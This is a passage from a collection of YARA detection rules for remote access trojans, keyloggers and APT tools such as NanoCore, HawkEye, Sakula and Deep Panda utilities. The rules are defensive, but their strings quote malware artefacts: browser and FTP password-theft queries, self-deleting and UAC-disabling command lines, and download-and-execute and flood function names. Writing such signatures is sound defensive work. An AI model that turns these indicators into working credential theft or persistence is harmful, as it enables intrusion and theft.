   		date = "2013-10-24"   
   		filetype = "memory"   
   		version = "1.0"    
   		ref1 = "http://www.fireeye.com/blog/technical/malware-research/2013/10/evasive-tactics-terminator-rat.html"    
      
   	strings:   
   		$a = "Accelorator"   
   		$b = "<html><title>12356</title><body>"   
      
   	condition:   
   		all of them   
// https://otx.alienvault.com/pulse/5977c728a87db76e38caeede
rule shimratreporter: RAT   
   {   
    meta:   
     description = "Detects ShimRatReporter"   
     author = "Yonathan Klijnsma (yonathan.klijnsma@fox-it.com)"   
     date = "20/11/2015"   
     ref = "https://blog.fox-it.com/2016/06/15/mofang-a-politically-motivated-information-stealing-adversary/"   
      
      
    strings:   
     $IpInfo = "IP-INFO"   
     $NetworkInfo = "Network-INFO"   
     $OsInfo = "OS-INFO"   
     $ProcessInfo = "Process-INFO"   
     $BrowserInfo = "Browser-INFO"   
     $QueryUserInfo = "QueryUser-INFO"   
     $UsersInfo = "Users-INFO"   
     $SoftwareInfo = "Software-INFO"   
     $AddressFormat = "%02X-%02X-%02X-%02X-%02X-%02X"   
     $proxy_str = "(from environment) = %s"   
      
     $netuserfun = "NetUserEnum"   
     $networkparams = "GetNetworkParams"   
      
    condition:   
     all of them   
rule shimrat: RAT   
   {   
    meta:   
     description = "Detects ShimRat and the ShimRat loader"   
     author = "Yonathan Klijnsma (yonathan.klijnsma@fox-it.com)"   
     date = "20/11/2015"   
     ref = "https://blog.fox-it.com/2016/06/15/mofang-a-politically-motivated-information-stealing-adversary/"   
        
    strings:   
     $dll = ".dll"   
     $dat = ".dat"   
     $headersig = "QWERTYUIOPLKJHG"   
     $datasig = "MNBVCXZLKJHGFDS"   
     $datamarker1 = "Data$$00"   
     $datamarker2 = "Data$$01%c%sData"   
     $cmdlineformat = "ping localhost -n 9 /c %s > nul"   
     $demoproject_keyword1 = "Demo"   
     $demoproject_keyword2 = "Win32App"   
     $comspec = "COMSPEC"   
     $shim_func1 = "ShimMain"   
     $shim_func2 = "NotifyShims"   
     $shim_func3 = "GetHookAPIs"   
      
      
    condition:   
     ($dll and $dat and $headersig and $datasig) or ($datamarker1 and $datamarker2) or ($cmdlineformat and $demoproject_keyword1 and $demoproject_keyword2 and $comspec) or ($dll and $dat and $shim_func1 and $shim_func2 and $shim_func3)   
// https://otx.alienvault.com/pulse/588a66cae4166d1290244b9a
rule Kraken_Bot_Sample : bot {   
   	meta:   
   		description = "Kraken Bot Sample - file inf.bin"   
   		author = "Florian Roth"   
   		reference = "https://blog.gdatasoftware.com/blog/article/dissecting-the-kraken.html"   
   		date = "2015-05-07"   
   		hash = "798e9f43fc199269a3ec68980eb4d91eb195436d"   
   		score = 90   
   	strings:   
   		$s2 = "%s=?getname" fullword ascii   
   		$s4 = "&COMPUTER=^" fullword ascii   
   		$s5 = "xJWFwcGRhdGElAA=" fullword ascii /* base64 encoded string '%appdata%' */   
   		$s8 = "JVdJTkRJUi" fullword ascii /* base64 encoded string '%WINDIR' */   
   		$s20 = "btcplug" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and all of them   
rule PythoRAT : RAT   
   {   
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
   		ref = "http://malwareconfig.com/stats/PythoRAT"   
   		maltype = "Remote Access Trojan"   
   		filetype = "exe"   
      
   	strings:   
   		$a = "TKeylogger"   
   		$b = "uFileTransfer"   
   		$c = "TTDownload"   
   		$d = "SETTINGS"   
   		$e = "Unknown" wide   
   		$f = "#@#@#"   
   		$g = "PluginData"   
   		$i = "OnPluginMessage"   
      
   	condition:   
   		all of them   
rule NanoCore : RAT   
   {   
       meta:   
           author = " Kevin Breen <kevin@techanarchy.net>"   
           date = "2014/04"   
           ref = "http://malwareconfig.com/stats/NanoCore"   
           maltype = "Remote Access Trojan"   
           filetype = "exe"   
      
       strings:   
           $a = "NanoCore"   
           $b = "ClientPlugin"   
           $c = "ProjectData"   
           $d = "DESCrypto"   
           $e = "KeepAlive"   
           $f = "IPNETROW"   
           $g = "LogClientMessage"   
   		$h = "|ClientHost"   
   		$i = "get_Connected"   
   		$j = "#=q"   
           $key = {43 6f 24 cb 95 30 38 39}   
      
      
       condition:   
           6 of them   
rule HawkEye : RAT   
   {   
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2015/06"   
   		ref = "http://malwareconfig.com/stats/HawkEye"   
   		maltype = "KeyLogger"   
   		filetype = "exe"   
      
   	strings:   
   		$key = "HawkEyeKeylogger" wide   
   		$salt = "099u787978786" wide   
   		$string1 = "HawkEye_Keylogger" wide   
   		$string2 = "holdermail.txt" wide   
   		$string3 = "wallet.dat" wide   
   		$string4 = "Keylog Records" wide   
           $string5 = "<!-- do not script -->" wide   
           $string6 = "\\pidloc.txt" wide   
           $string7 = "BSPLIT" wide   
              
      
   	condition:   
   		$key and $salt and all of ($string*)   
rule PredatorPain : RAT   
   {   
      
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
   		ref = "http://malwareconfig.com/stats/PredatorPain"   
   		maltype = "Remote Access Trojan"   
   		filetype = "exe"   
      
   	strings:   
   		$string1 = "holderwb.txt" wide   
   		$string3 = "There is a file attached to this email" wide   
   		$string4 = "screens\\screenshot" wide   
   		$string5 = "Disablelogger" wide   
   		$string6 = "\\pidloc.txt" wide   
           $string7 = "clearie" wide   
           $string8 = "clearff" wide   
           $string9 = "emails should be sent to you shortly" wide   
           $string10 = "jagex_cache\\regPin" wide   
           $string11 = "open=Sys.exe" wide   
   		$ver1 = "PredatorLogger" wide   
   		$ver2 = "EncryptedCredentials" wide   
           $ver3 = "Predator Pain" wide   
      
   	condition:   
   		7 of ($string*) and any of ($ver*)   
rule SpyGate : RAT   
   {   
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
   		ref = "http://malwareconfig.com/stats/SpyGate"   
   		maltype = "Remote Access Trojan"   
   		filetype = "exe"   
      
   	strings:   
   		$split = "abccba"   
   		$a1 = "abccbaSpyGateRATabccba" //$a = Version 0.2.6   
   		$a2 = "StubX.pdb"    
   		$a3 = "abccbaDanabccb"   
   		$b1 = "monikerString" nocase //$b = Version 2.0   
   		$b2 = "virustotal1"   
   		$b3 = "get_CurrentDomain"   
   		$c1 = "shutdowncomputer" wide //$c = Version 2.9   
   		$c2 = "shutdown -r -t 00" wide   
   		$c3 = "set cdaudio door closed" wide   
   		$c4 = "FileManagerSplit" wide   
   		$c5 = "Chating With >> [~Hacker~]" wide   
      
   	condition:   
   		(all of ($a*) and #split > 40) or (all of ($b*) and #split > 10) or (all of ($c*))   
rule LuxNet : RAT   
   {   
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
   		ref = "http://malwareconfig.com/stats/LuxNet"   
   		maltype = "Remote Access Trojan"   
   		filetype = "exe"   
      
   	strings:   
   		$a = "GetHashCode"   
   		$b = "Activator"   
   		$c = "WebClient"   
   		$d = "op_Equality"   
   		$e = "dickcursor.cur" wide   
   		$f = "{0}|{1}|{2}" wide   
      
   	condition:   
   		all of them   
rule Vertex : RAT   
   {   
      
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
   		ref = "http://malwareconfig.com/stats/Vertex"   
   		maltype = "Remote Access Trojan"   
   		filetype = "exe"   
      
   	strings:   
   		$string1 = "DEFPATH"   
   		$string2 = "HKNAME"   
   		$string3 = "HPORT"   
   		$string4 = "INSTALL"   
   		$string5 = "IPATH"   
   		$string6 = "MUTEX"   
   		$res1 = "PANELPATH"   
   		$res2 = "ROOTURL"   
      
   	condition:   
   		all of them   
rule Ap0calypse: RAT   
   {   
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
   		ref = "http://malwareconfig.com/stats/Ap0calypse"   
   		maltype = "Remote Access Trojan"   
   		filetype = "exe"   
      
   	strings:   
   		$a = "Ap0calypse"   
   		$b = "Sifre"   
   		$c = "MsgGoster"   
   		$d = "Baslik"   
   		$e = "Dosyalars"   
   		$f = "Injecsiyon"   
      
   	condition:   
   		all of them   
rule Punisher : RAT   
   {   
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
   		ref = "http://malwareconfig.com/stats/Punisher"   
   		maltype = "Remote Access Trojan"   
   		filetype = "exe"   
      
   	strings:   
   		$a = "abccba"   
   		$b = {5C 00 68 00 66 00 68 00 2E 00 76 00 62 00 73}   
   		$c = {5C 00 73 00 63 00 2E 00 76 00 62 00 73}   
   		$d = "SpyTheSpy" wide ascii   
   		$e = "wireshark" wide   
   		$f = "apateDNS" wide   
   		$g = "abccbaDanabccb"   
      
   	condition:   
   		all of them   
rule QRat : RAT   
   {   
       meta:   
           author = "Kevin Breen @KevTheHermit"   
           date = "2015/08"   
           ref = "http://malwareconfig.com"   
           maltype = "Remote Access Trojan"   
           filetype = "jar"   
              
       strings:   
           $a0 = "e-data"   
           $a1 = "quaverse/crypter"   
           $a2 = "Qrypt.class"   
           $a3 = "Jarizer.class"   
           $a4 = "URLConnection.class"   
              
              
       condition:   
           4 of them   
      
      
rule DarkRAT : RAT   
   {   
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
   		ref = "http://malwareconfig.com/stats/DarkRAT"   
   		maltype = "Remote Access Trojan"   
   		filetype = "exe"   
      
   	strings:   
   		$a = "@1906dark1996coder@"   
   		$b = "SHEmptyRecycleBinA"   
   		$c = "mciSendStringA"   
   		$d = "add_Shutdown"   
   		$e = "get_SaveMySettingsOnExit"   
   		$f = "get_SpecialDirectories"   
   		$g = "Client.My"   
      
   	condition:   
   		all of them   
rule UPX : RAT   
   {   
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
      
   	strings:   
   		$a = "UPX0"   
   		$b = "UPX1"   
   		$c = "UPX!"   
      
   	condition:   
   		all of them   
rule VirusRat : RAT   
   {   
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
   		ref = "http://malwareconfig.com/stats/VirusRat"   
   		maltype = "Remote Access Trojan"   
   		filetype = "exe"   
      
   	strings:   
   		$string0 = "virustotal"   
   		$string1 = "virusscan"   
   		$string2 = "abccba"   
   		$string3 = "pronoip"   
   		$string4 = "streamWebcam"   
   		$string5 = "DOMAIN_PASSWORD"   
   		$string6 = "Stub.Form1.resources"   
   		$string7 = "ftp://{0}@{1}" wide   
   		$string8 = "SELECT * FROM moz_logins" wide   
   		$string9 = "SELECT * FROM moz_disabledHosts" wide   
   		$string10 = "DynDNS\\Updater\\config.dyndns" wide   
   		$string11 = "|BawaneH|" wide   
      
   	condition:   
   		all of them   
rule AAR : RAT   
   {   
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
   		ref = "http://malwareconfig.com/stats/AAR"   
   		maltype = "Remote Access Trojan"   
   		filetype = "exe"   
      
   	strings:   
   		$a = "Hashtable"   
   		$b = "get_IsDisposed"   
   		$c = "TripleDES"   
   		$d = "testmemory.FRMMain.resources"   
   		$e = "$this.Icon" wide   
   		$f = "{11111-22222-20001-00001}" wide   
   		$g = "@@@@@"   
      
   	condition:   
   		all of them   
rule Bandook : RAT   
   {   
      
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
   		ref = "http://malwareconfig.com/stats/bandook"   
   		maltype = "Remote Access Trojan"   
   		filetype = "exe"   
              
       strings:   
       		$a = "aaaaaa1|"   
               $b = "aaaaaa2|"   
               $c = "aaaaaa3|"   
               $d = "aaaaaa4|"   
   			$e = "aaaaaa5|"   
   			$f = "%s%d.exe"   
   			$g = "astalavista"   
   			$h = "givemecache"   
   			$i = "%s\\system32\\drivers\\blogs\\*"   
   			$j = "bndk13me"   
   			   
      
              
       condition:   
       		all of them   
rule Plasma : RAT   
   {   
       meta:   
           author = " Kevin Breen <kevin@techanarchy.net>"   
           date = "2014/04"   
           ref = "http://malwareconfig.com/stats/Plasma"   
           maltype = "Remote Access Trojan"   
           filetype = "exe"   
      
       strings:   
           $a = "Miner: Failed to Inject." wide   
           $b = "Started GPU Mining on:" wide   
           $c = "BK: Hard Bot Killer Ran Successfully!" wide   
           $d = "Uploaded Keylogs Successfully!" wide   
           $e = "No Slowloris Attack is Running!" wide   
           $f = "An ARME Attack is Already Running on" wide   
           $g = "Proactive Bot Killer Enabled!" wide   
           $h = "PlasmaRAT" wide ascii   
           $i = "AntiEverything" wide ascii   
      
       condition:   
           all of them   
rule Infinity : RAT   
   {   
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
   		ref = "http://malwareconfig.com/stats/Infinity"   
   		maltype = "Remote Access Trojan"   
   		filetype = "exe"   
      
   	strings:   
   		$a = "CRYPTPROTECT_PROMPTSTRUCT"   
   		$b = "discomouse"   
   		$c = "GetDeepInfo"   
   		$d = "AES_Encrypt"   
   		$e = "StartUDPFlood"   
   		$f = "BATScripting" wide   
   		$g = "FBqINhRdpgnqATxJ.html" wide   
   		$i = "magic_key" wide   
      
   	condition:   
   		all of them   
rule BlueBanana : RAT   
   {   
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
   		ref = "http://malwareconfig.com/stats/BlueBanana"   
   		maltype = "Remote Access Trojan"   
   		filetype = "Java"   
      
   	strings:   
   		$meta = "META-INF"   
   		$conf = "config.txt"   
   		$a = "a/a/a/a/f.class"   
   		$b = "a/a/a/a/l.class"   
   		$c = "a/a/a/b/q.class"   
   		$d = "a/a/a/b/v.class"   
      
   		   
   	condition:   
   		all of them   
rule LuminosityLink : RAT   
   {   
       meta:   
           author = " Kevin Breen <kevin@techanarchy.net>"   
           date = "2014/04"   
           ref = "http://malwareconfig.com/stats/LuminosityLink"   
           maltype = "Remote Access Trojan"   
           filetype = "exe"   
      
       strings:   
           $a = "SMARTLOGS" wide   
           $b = "RUNPE" wide   
           $c = "b.Resources" wide   
           $d = "CLIENTINFO*" wide   
           $e = "Invalid Webcam Driver Download URL, or Failed to Download File!" wide   
           $f = "Proactive Anti-Malware has been manually activated!" wide   
           $g = "REMOVEGUARD" wide   
           $h = "C0n1f8" wide   
           $i = "Luminosity" wide   
           $j = "LuminosityCryptoMiner" wide   
           $k = "MANAGER*CLIENTDETAILS*" wide   
      
       condition:   
           all of them   
rule Imminent : RAT   
   {   
       meta:   
           author = " Kevin Breen <kevin@techanarchy.net>"   
           date = "2014/04"   
           ref = "http://malwareconfig.com/stats/Imminent"   
           maltype = "Remote Access Trojan"   
           filetype = "exe"   
      
       strings:   
           $v1a = "DecodeProductKey"   
           $v1b = "StartHTTPFlood"   
           $v1c = "CodeKey"   
           $v1d = "MESSAGEBOX"   
           $v1e = "GetFilezillaPasswords"   
           $v1f = "DataIn"   
           $v1g = "UDPzSockets"   
           $v1h = {52 00 54 00 5F 00 52 00 43 00 44 00 41 00 54 00 41}   
      
           $v2a = "<URL>k__BackingField"   
           $v2b = "<RunHidden>k__BackingField"   
           $v2c = "DownloadAndExecute"   
           $v2d = "-CHECK & PING -n 2 127.0.0.1 & EXIT" wide   
           $v2e = "england.png" wide   
           $v2f = "Showed Messagebox" wide   
       condition:   
           all of ($v1*) or all of ($v2*)   
rule Sub7Nation : RAT   
   {   
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
   		ref = "http://malwareconfig.com/stats/Sub7Nation"   
   		maltype = "Remote Access Trojan"   
   		filetype = "exe"   
      
   	strings:   
   		$a = "EnableLUA /t REG_DWORD /d 0 /f"   
   		$b = "*A01*"   
   		$c = "*A02*"   
   		$d = "*A03*"   
   		$e = "*A04*"	   
   		$f = "*A05*"   
   		$g = "*A06*"   
   		$h = "#@#@#"   
   		$i = "HostSettings"   
   		$verSpecific1 = "sevane.tmp"   
   		$verSpecific2 = "cmd_.bat"   
   		$verSpecific3 = "a2b7c3d7e4"   
   		$verSpecific4 = "cmd.dll"   
      
   		   
   	condition:   
   		all of them   
rule SmallNet : RAT   
   {   
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
   		ref = "http://malwareconfig.com/stats/SmallNet"   
   		maltype = "Remote Access Trojan"   
   		filetype = "exe"   
   		   
   	strings:   
   		$split1 = "!!<3SAFIA<3!!"   
   		$split2 = "!!ElMattadorDz!!"   
   		$a1 = "stub_2.Properties"   
   		$a2 = "stub.exe" wide   
   		$a3 = "get_CurrentDomain"   
      
   	condition:   
   		($split1 or $split2) and (all of ($a*))   
rule unrecom : RAT   
   {   
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
   		ref = "http://malwareconfig.com/stats/AAR"   
   		maltype = "Remote Access Trojan"   
   		filetype = "exe"   
      
   	strings:   
   		$meta = "META-INF"   
   		$conf = "load/ID"   
   		$a = "load/JarMain.class"   
   		$b = "load/MANIFEST.MF"   
           $c = "plugins/UnrecomServer.class"   
      
   	condition:   
   		all of them   
rule Arcom : RAT   
   {   
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
   		ref = "http://malwareconfig.com/stats/Arcom"   
   		maltype = "Remote Access Trojan"   
   		filetype = "exe"   
              
       strings:   
           $a1 = "CVu3388fnek3W(3ij3fkp0930di"   
           $a2 = "ZINGAWI2"   
           $a3 = "clWebLightGoldenrodYellow"   
           $a4 = "Ancestor for '%s' not found" wide   
           $a5 = "Control-C hit" wide   
           $a6 = {A3 24 25 21}   
              
       condition:   
           all of them   
rule Greame : RAT   
   {   
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
   		ref = "http://malwareconfig.com/stats/Greame"   
   		maltype = "Remote Access Trojan"   
   		filetype = "exe"   
   		   
   	strings:   
       		$a = {23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23}   
               $b = {23 23 23 23 40 23 23 23 23 FA FD F0 EF F9 23 23 23 23 40 23 23 23 23}   
               $c = "EditSvr"   
               $d = "TLoader"   
   			$e = "Stroks"   
               $f = "Avenger by NhT"   
   			$g = "####@####"   
   			$h = "GREAME"   
   			   
       condition:   
       		all of them   
rule JavaDropper : RAT   
   {   
       meta:   
   	    author = " Kevin Breen <kevin@techanarchy.net>"   
   	    date = "2015/10"   
   	    ref = "http://malwareconfig.com/stats/AlienSpy"   
   	    maltype = "Remote Access Trojan"   
   	    filetype = "exe"   
      
       strings:   
   	    $jar = "META-INF/MANIFEST.MF"   
      
   	    $a1 = "ePK"   
   	    $a2 = "kPK"   
      
           $b1 = "config.ini"   
           $b2 = "password.ini"   
      
           $c1 = "stub/stub.dll"   
      
           $d1 = "c.dat"   
      
       condition:   
           $jar and (all of ($a*) or all of ($b*) or all of ($c*) or all of ($d*))   
rule LostDoor : RAT   
   {   
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
   		ref = "http://malwareconfig.com/stats/LostDoor"   
   		maltype = "Remote Access Trojan"   
   		filetype = "exe"   
              
       strings:   
       	$a0 = {0D 0A 2A 45 44 49 54 5F 53 45 52 56 45 52 2A 0D 0A}   
           $a1 = "*mlt* = %"   
           $a2 = "*ip* = %"   
           $a3 = "*victimo* = %"   
           $a4 = "*name* = %"   
           $b5 = "[START]"   
           $b6 = "[DATA]"   
           $b7 = "We Control Your Digital World" wide ascii   
           $b8 = "RC4Initialize" wide ascii   
           $b9 = "RC4Decrypt" wide ascii   
              
       condition:   
       	all of ($a*) or all of ($b*)   
rule Paradox : RAT   
   {   
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
   		ref = "http://malwareconfig.com/stats/Paradox"   
   		maltype = "Remote Access Trojan"   
   		filetype = "exe"   
      
   	strings:   
   		$a = "ParadoxRAT"   
   		$b = "Form1"   
   		$c = "StartRMCam"   
   		$d = "Flooders"   
   		$e = "SlowLaris"   
   		$f = "SHITEMID"   
   		$g = "set_Remote_Chat"   
      
   	condition:   
   		all of them   
rule BlackNix : RAT   
   {   
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
   		ref = "http://malwareconfig.com/stats/BlackNix"   
   		maltype = "Remote Access Trojan"   
   		filetype = "exe"   
              
       strings:   
   		$a1 = "SETTINGS" wide   
   		$a2 = "Mark Adler"   
   		$a3 = "Random-Number-Here"   
   		$a4 = "RemoteShell"   
   		$a5 = "SystemInfo"   
      
   	   
   	condition:   
   		all of them   
rule ClientMesh : RAT   
   {   
       meta:   
           author = "Kevin Breen <kevin@techanarchy.net>"   
           date = "2014/06"   
           ref = "http://malwareconfig.com/stats/ClientMesh"   
           family = "torct"   
      
       strings:   
           $string1 = "machinedetails"   
           $string2 = "MySettings"   
           $string3 = "sendftppasswords"   
           $string4 = "sendbrowserpasswords"   
           $string5 = "arma2keyMass"   
           $string6 = "keylogger"   
           $conf = {00 00 00 00 00 00 00 00 00 7E}   
      
       condition:   
           all of them   
rule ShadowTech   
   {   
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
   		ref = "http://malwareconfig.com/stats/ShadowTech"   
   		maltype = "Remote Access Trojan"   
   		filetype = "exe"   
      
   	strings:   
   		$a = "ShadowTech" nocase   
   		$b = "DownloadContainer"   
   		$c = "MySettings"   
   		$d = "System.Configuration"   
   		$newline = "#-@NewLine@-#" wide   
   		$split = "pSIL" wide   
   		$key = "ESIL" wide   
      
   	condition:   
   		4 of them   
rule ShadowTech_2   
   {   
       meta:   
           description = "ShadowTech RAT"   
   	author = "botherder https://github.com/botherder"   
      
       strings:   
           $string1 = /\#(S)trings/   
           $string2 = /\#(G)UID/   
           $string3 = /\#(B)lob/   
           $string4 = /(S)hadowTech Rat\.exe/   
           $string5 = /(S)hadowTech_Rat/   
      
       condition:   
           all of them   
// https://otx.alienvault.com/pulse/564ce8824637f2388aafcc00
rule Anthem_DeepPanda_lot1   
   {   
      
       meta:   
           description = "Anthem Hack Deep Panda - lot1.tmp-pwdump"   
           author = "Florian Roth"   
           date = "2015/02/08"   
           hash = "5d201a0fb0f4a96cefc5f73effb61acff9c818e1"   
      
       strings:   
           $s0 = "Unable to open target process: %d, pid %d" fullword ascii   
           $s1 = "Couldn't delete target executable from remote machine: %d" fullword ascii   
           $s2 = "Target: Failed to load SAM functions." fullword ascii   
           $s5 = "Error writing the test file %s, skipping this share" fullword ascii   
           $s6 = "Failed to create service (%s/%s), error %d" fullword ascii   
           $s8 = "Service start failed: %d (%s/%s)" fullword ascii   
           $s12 = "PwDump.exe" fullword ascii   
           $s13 = "GetAvailableWriteableShare returned an error of %ld" fullword ascii   
           $s14 = ":\\\\.\\pipe\\%s" fullword ascii   
           $s15 = "Couldn't copy %s to destination %s. (Error %d)" fullword ascii   
           $s16 = "dump logon session" fullword ascii   
           $s17 = "Timed out waiting to get our pipe back" fullword ascii   
           $s19 = "SetNamedPipeHandleState failed, error %d" fullword ascii   
           $s20 = "%s\\%s.exe" fullword ascii   
      
       condition:   
           10 of them   
rule Anthem_DeepPanda_htran_exe   
   {   
      
       meta:   
           description = "Anthem Hack Deep Panda - htran-exe"   
           author = "Florian Roth"   
           date = "2015/02/08"   
           hash = "38e21f0b87b3052b536408fdf59185f8b3d210b9"   
      
       strings:   
           $s0 = "%s -<listen|tran|slave> <option> [-log logfile]" fullword ascii   
           $s1 = "[-] Gethostbyname(%s) error:%s" fullword ascii   
           $s2 = "e:\\VS 2008 Project\\htran\\Release\\htran.pdb" fullword ascii   
           $s3 = "[SERVER]connection to %s:%d error" fullword ascii   
           $s4 = "-tran  <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii   
           $s5 = "[-] ERROR: Must supply logfile name." fullword ascii   
           $s6 = "[-] There is a error...Create a new connection." fullword ascii   
           $s7 = "[+] Accept a Client on port %d from %s" fullword ascii   
           $s8 = "======================== htran V%s =======================" fullword ascii   
           $s9 = "[-] Socket Listen error." fullword ascii   
           $s10 = "[-] ERROR: open logfile" fullword ascii   
           $s11 = "-slave  <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii   
           $s12 = "[+] Make a Connection to %s:%d ......" fullword ascii   
           $s14 = "Recv %5d bytes from %s:%d" fullword ascii   
           $s15 = "[+] OK! I Closed The Two Socket." fullword ascii   
           $s16 = "[+] Waiting another Client on port:%d...." fullword ascii   
           $s17 = "[+] Accept a Client on port %d from %s ......" fullword ascii   
           $s20 = "-listen <ConnectPort> <TransmitPort>" fullword ascii   
      
       condition:   
           10 of them   
rule Anthem_DeepPanda_sl_txt_packed   
   {   
      
       meta:   
           description = "Anthem Hack Deep Panda - ScanLine sl-txt-packed"   
           author = "Florian Roth"   
           date = "2015/02/08"   
           hash = "ffb1d8ea3039d3d5eb7196d27f5450cac0ea4f34"   
      
       strings:   
           $s0 = "Command line port scanner" fullword wide   
           $s1 = "sl.exe" fullword wide   
           $s2 = "CPports.txt" fullword ascii   
           $s3 = ",GET / HTTP/.}" fullword ascii   
           $s4 = "Foundstone Inc." fullword wide   
           $s9 = " 2002 Foundstone Inc." fullword wide   
           $s15 = ", Inc. 2002" fullword ascii   
           $s20 = "ICMP Time" fullword ascii   
      
       condition:   
           all of them   
rule Anthem_DeepPanda_Trojan_Kakfum   
   {   
      
       meta:   
           description = "Anthem Hack Deep Panda - Trojan.Kakfum sqlsrv32.dll"   
           author = "Florian Roth"   
           date = "2015/02/08"   
           hash1 = "ab58b6aa7dcc25d8f6e4b70a24e0ccede0d5f6129df02a9e61293c1d7d7640a2"   
           hash2 = "c6c3bb72896f8f0b9a5351614fd94e889864cf924b40a318c79560bbbcfa372f"   
      
       strings:   
           $s0 = "%SystemRoot%\\System32\\svchost.exe -k sqlserver" fullword ascii   
           $s1 = "%s\\sqlsrv32.dll" fullword ascii   
           $s2 = "%s\\sqlsrv64.dll" fullword ascii   
           $s3 = "%s\\%d.tmp" fullword ascii   
           $s4 = "ServiceMaix" fullword ascii   
           $s15 = "sqlserver" fullword ascii   
      
       condition:   
           all of them   
rule sakula_v1_4: RAT   
   {   
       meta:   
           description = "Sakula v1.4"   
           date = "2015-10-13"   
           author = "Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou"   
       strings:   
           $m1 = "%d_of_%d_for_%s_on_%s"   
           $m2 = "/c ping 127.0.0.1 & del /q \"%s\""   
           $m3 = "cmd.exe /c rundll32 \"%s\""   
      
           $v1_4 = { 50 E8 CD FC FF FF 83 C4  04 68 E8 03 00 00 FF D7 56 E8 54 12 00 00 E9 AE  FE FF FF E8 13 F5 FF FF }   
      
           $MZ = "MZ"   
       condition:   
           $MZ at 0 and all of them   
rule sakula_v1_0: RAT   
   {   
       meta:   
           description = "Sakula v1.0"   
           date = "2015-10-13"   
           author = "Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou"   
       strings:   
           $m1 = "%d_of_%d_for_%s_on_%s"   
           $m2 = "/c ping 127.0.0.1 & del /q \"%s\""   
           $m3 = "=%s&type=%d"   
           $m4 = "?photoid="   
           $m5 = "iexplorer"   
                   $m6 = "net start \"%s\""   
           $v1_1 = "MicroPlayerUpdate.exe"   
           $MZ = "MZ"   
       condition:   
           $MZ at 0 and all of ($m*) and not $v1_1   
rule sakula_v1_3: RAT   
   {   
       meta:   
           description = "Sakula v1.3"   
           date = "2015-10-13"   
           author = "Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou"   
       strings:   
           $m1 = "%d_of_%d_for_%s_on_%s"   
           $m2 = "/c ping 127.0.0.1 & del /q \"%s\""   
           $m3 = "cmd.exe /c rundll32 \"%s\""   
      
           $v1_3 = { 81 3E 78 03 00 00 75 57  8D 54 24 14 52 68 0C 05 41 00 68 01 00 00 80 FF  15 00 F0 40 00 85 C0 74 10 8B 44 24 14 68 2C 31  41 00 50 FF 15 10 F0 40 00 8B 4C 24 14 51 FF 15  24 F0 40 00 E8 0F 09 00 }   
      
           $MZ = "MZ"   
       condition:   
           $MZ at 0 and all of them   
rule sakula_v1_1: RAT   
   {   
       meta:   
           description = "Sakula v1.1"   
           date = "2015-10-13"   
           author = "Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou"   
       strings:   
           $m1 = "%d_of_%d_for_%s_on_%s"   
           $m2 = "/c ping 127.0.0.1 & del /q \"%s\""   
           $m3 = "=%s&type=%d"   
           $m4 = "?photoid="   
           $m5 = "iexplorer"   
                   $m6 = "net start \"%s\""   
           $v1_1 = "MicroPlayerUpdate.exe"   
           $MZ = "MZ"   
       condition:   
           $MZ at 0 and all of them   
rule sakula_v1_2: RAT   
   {   
       meta:   
           description = "Sakula v1.2"   
           date = "2015-10-13"   
           author = "Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou"   
       strings:   
           $m1 = "%d_of_%d_for_%s_on_%s"   
           $m2 = "/c ping 127.0.0.1 & del /q \"%s\""   
           $m3 = "cmd.exe /c rundll32 \"%s\""   
           $v1_1 = "MicroPlayerUpdate.exe"   
           $v1_2 = "CCPUpdate"   
      
           $MZ = "MZ"   
       condition:   
           $MZ at 0 and $m1 and $m2 and $m3 and $v1_2 and not $v1_1   
// https://otx.alienvault.com/pulse/58cbc1358a636209a5948ac7
rule poisonivy_1 : rat   
   {   
   	meta:   
   		description = "Poison Ivy"   
   		author = "Jean-Philippe Teissier / @Jipe_"   
   		date = "2013-02-01"   
   		filetype = "memory"   
   		version = "1.0"    
   		ref1 = "https://code.google.com/p/volatility/source/browse/trunk/contrib/plugins/malware/poisonivy.py"   
      
   	strings:   
